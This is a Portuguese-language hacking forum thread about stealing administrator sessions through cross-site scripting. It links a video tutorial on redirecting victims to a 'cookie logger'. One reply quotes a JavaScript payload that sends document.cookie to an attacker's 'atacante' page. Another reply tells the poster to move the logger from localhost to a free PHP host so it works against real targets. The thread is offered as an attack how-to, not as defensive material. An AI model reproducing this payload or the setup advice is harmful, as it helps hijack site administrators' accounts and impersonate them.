Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Roubo de sessão com xss

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Video Aula Roubo de sessão com xss

    Roubo de sessão com xss


    Vídeo:[ame]http://www.youtube.com/watch?v=0eukqfjjq_0[/ame]


    Muitos programadores só se preocupam com a parte do conteúdo visto pelos usuários que acessam o site, e deixam de se preucupar com a segurança do gerenciador de conteúdo. Com essa falta de cautela podemos enviar códigos java script redirecionando para um cookie looger , que capturam sessões de administradores.

    Com a sessão do administrador, podemos se passar por "ele", e conseguir o acesso no mesmo nivel que o mesmo tem.

    Download dos arquivo usado no vídeo: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    "Só Deus pode me julgar" 2Pac Eterno.


    Similar Threads
    Tags: roubo de sessão
    • Top
  • Font Size
    #2
    vlw , por compartilhar.
    mas tarde quando chegar vou tentar um pouco.



    • Top

    Comment

    • Font Size
      #3
      louco manow parabens
      • Top

      Comment

      • Font Size
        #4
        BrLo0ping, parabéns pelo tutorial!! Comigo não funcionou, mas acho que fiz alguma coisa errada...rs

        Fiz da seguinte forma:

        Alvo: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
        Atacante: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

        no script ficou: window.location.href="http://localhost/atacante/index.php?id=" +document.cookie

        Será que o motivo é o localhost?
        Os testes da pagina dados retornarem teste1 e teste2 funcionou. Mas o resto não...hehehe

        Obrigado e desculpa a ignorância, mas estou iniciando ainda.
        Abraços
        • Top

        Comment

        • Font Size
          #5
          Postado Originalmente por Little_Ugly Ver Post
          BrLo0ping, parabéns pelo tutorial!! Comigo não funcionou, mas acho que fiz alguma coisa errada...rs

          Fiz da seguinte forma:

          Alvo: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
          Atacante: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

          no script ficou: window.location.href="http://localhost/atacante/index.php?id=" +document.cookie

          Será que o motivo é o localhost?
          Os testes da pagina dados retornarem teste1 e teste2 funcionou. Mas o resto não...hehehe

          Obrigado e desculpa a ignorância, mas estou iniciando ainda.
          Abraços
          Mano local host está dentro da sua rede, só funciona na sua rede, por isso que não funciono, procura uma hospedagem free com php


          "Só Deus pode me julgar" 2Pac Eterno.


          • Top

          Comment

          Anterior template Avançar
          X
          Working...
          X